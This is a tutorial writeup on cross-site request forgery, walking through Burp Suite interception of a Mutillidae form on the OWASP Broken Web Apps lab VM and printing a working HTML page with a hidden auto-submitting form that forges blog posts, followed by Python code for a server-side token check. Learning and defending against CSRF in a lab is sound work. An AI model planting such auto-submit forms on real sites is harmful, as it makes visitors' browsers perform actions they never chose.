(CSRF) Cross-Site Request Forgery
I've been playing around with Web Application Security and wanted to do a writeup on CSRF (pronounced C-SURF). For those of you who are unfamiliar with CSRF, it's the act of making a victim's browser send a POST form to a target site the attacker chooses, by having the victim visit a page with your CSRF code on it. That probably sounded more complicated than it really is. Here are the general steps:
- Research the target site and see what params are in the Body.
- Write a <form> that has all the necessary params and values you want to submit.
- Place the code on a website your victim will go to.
- After they visit the site, they will submit the form.
Prerequisites: This tutorial will go over the most basic usage of Burp Suite. If you've never used Burp Suite before, this tutorial is for you! You should have some knowledge of how to set up a VM. I won't be going over that, and assume you can set up the OWASP Broken Web Apps VM and get to it via a browser. Same with MAMP.
Firefox - A browser > Internet Explorer
Burp Suite - Setup local proxy to intercept browser traffic
MAMP (macOS, Apache, MySQL, PHP) - Launches a local Web Server (There's also WAMP for Windows and LAMP for GNU Linux)
OWASP Broken Web Applications - A very vulnerable Web Server for learning
VirtualBox - Virtualize the OWASP VM
Visual Studio Code (any IDE or text editor will work)
Here is how our network is configured.
- 192.168.56.101 - OWASP VM
- 192.168.56.1 - Virtual Router and MAMP Server
Yours might look different. The only necessary thing is that both web servers can talk to each other.
Burp Suite Setup
Firefox Settings: Proxy
Perfect. Now, given that both your MAMP server and OWASP VM are running AND able to connect to one another, let's continue to gather information about the form. (I should warn: NEVER connect vulnerable VM boxes directly to the internet. The best configuration is to set up your Host OS (in this case, my Mac) and your Guest OS (the OWASP VM) on a virtual network. In VirtualBox, you can do this by clicking Settings > Network and setting the NIC to attach to a Host-only Adapter.)
Great! Now let's navigate to the CSRF portion of this VM.
When your server is launched, you should see this page by putting its IP in your browser. We will be going through the Mutillidae II tutorial so click the button!
...but wait. Something's wrong. It didn't take us to the next page. It's taking forever and just hanging. This is because the request is hanging out in our Burp Suite Proxy! Let's take a look.
By clicking the Forward button, the request is sent to the server and we can continue.
Now we will navigate to the CSRF page.
OWASP 2013 > A8 Cross-Site Request Forgery (CSRF) > Add to your blog
Don't forget to forward your request in your Burp Suite!
The next page will have blog posts of user "anonymous". This means the website allows for anyone to post blogs. Let's exploit the ability to post blogs via CSRF.
Now's the fun part! Let's post something as anon, and review the request. Cardi B lyrics seems appropriate as of Nov 14th, 2017. I'm sure this won't date well, but whatever. =]
Once we input our lyrics and click Save Blog Entry, we head over to our Burp Suite to see it catch the POST.
What we want to do here is gather all the information for the Body Params. In our case, it is the following:
- csrf-token = NULL
- blog_entry = "My pussy glitter as gold"
- add-to-your-blog-php-submit-button = "Save Blog Entry"
Awesome! Along with the website's URL, we now have all the information we need. Muahaha. Time to head over to our MAMP web server and place a file in there.
Your front page will probably look different. I just changed my index.html file and put this there. We will now be creating the website that will force any user who visits the page to submit a blog post to the OWASP website. Programming time!
What we're going to want to do, is create a <form> with all the body params, and then create a <script> that submits the form.
Here, we need to supply the address of the website we want to POST to in the form's action attribute. Thereafter, we simply put the name and associated value of each body param into a hidden input.
<!-- Form Post -->
<form name="csrf" action="https://192.168.56.101/mutillidae/index.php?page=add-to-your-blog.php" method="POST">
<input type="hidden" name='csrf-token' value=''>
<input type="hidden" name='blog_entry' value='This entry was totally hacked!'>
<input type="hidden" name='add-to-your-blog-php-submit-button' value='Save Blog Entry'>
</form>
Sweet! Now just for some fun, I added a photo and a few words into the file I created, named blog.html. Here is the full code.
<html>
<body>
<center>
<h1>Welcome to My Website!</h1>
If you're reading this, you probably have been hacked.<br><br>
<img src="http://weknowmemes.com/wp-content/uploads/2011/11/free-shrugs.jpg"><br>
Sorry, not sorry.<br>
<!-- Form Post -->
<form name="csrf" action="https://192.168.56.101/mutillidae/index.php?page=add-to-your-blog.php" method="POST">
<input type="hidden" name='csrf-token' value=''>
<input type="hidden" name='blog_entry' value='This entry was totally hacked!'>
<input type="hidden" name='add-to-your-blog-php-submit-button' value='Save Blog Entry'>
</form>
<!-- Auto-submit the hidden form as soon as the page loads -->
<script>document.csrf.submit();</script>
<!-- End Form Post -->
</center>
</body>
</html>
Let's go visit the website, and see what happens on OWASP's side! BUT BEFORE, flip off the Intercept button on your Burp Suite Proxy. Makes things go smoother.
Success! We successfully made a visitor to my MAMP website submit a form to the OWASP website!
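The reason this works is the csrf-token = NULL observation above: the blog page accepts an empty token. As an added example (not part of the original writeup, nor Mutillidae's code), here is the server-side check that would have stopped it: issue a random per-session token, embed it in the form, and refuse any POST whose csrf-token is missing, empty, or different from the session's copy. The session store, function names and the Origin-header check are assumptions for illustration.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed stand-in for a server-side session store (assumption:
# one dict per session id; a real app would use its framework's session).
SESSIONS = {}


def issue_csrf_token(session_id):
    """Mint a fresh random token, remember it for this session, and return
    it so the page can embed it as the hidden csrf-token field."""
    token = secrets.token_urlsafe(32)
    SESSIONS.setdefault(session_id, {})["csrf_token"] = token
    return token


def csrf_request_allowed(session_id, body, origin, allowed_origin):
    """Return True only if this POST carries the session's own token.

    'body' is the raw application/x-www-form-urlencoded body, i.e.
    'csrf-token=...&blog_entry=...&add-to-your-blog-php-submit-button=...'.
    An absent or empty token is rejected (the forged form sends value=''),
    and the comparison is constant-time so the token cannot be guessed
    byte by byte from response timing.
    """
    expected = SESSIONS.get(session_id, {}).get("csrf_token")
    if not expected:
        return False  # no token was ever issued to this session
    # parse_qs drops blank values by default, so '' falls back to the default
    submitted = parse_qs(body).get("csrf-token", [""])[0]
    if not submitted:
        return False  # empty / NULL token, exactly what the forged form sends
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return False
    # Defence in depth: a cross-site form post carries the attacker page's
    # origin when the browser sends one; anything foreign is refused.
    if origin is not None and origin != allowed_origin:
        return False
    return True
```

With this in place the forged page's POST fails even though its other two params are exactly right, because the token is empty and the Origin is the MAMP host rather than the OWASP VM.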
Cons: One of the issues is that it redirects the submitted website. I attempted something like <script>window.location.replace("http://stackoverflow.com");</script>
But it didn't seem to work. Maybe there's a way to submit a request, but also have the site send you back to the form site? But then there'd be a loop... Any insight on this would be appreciated!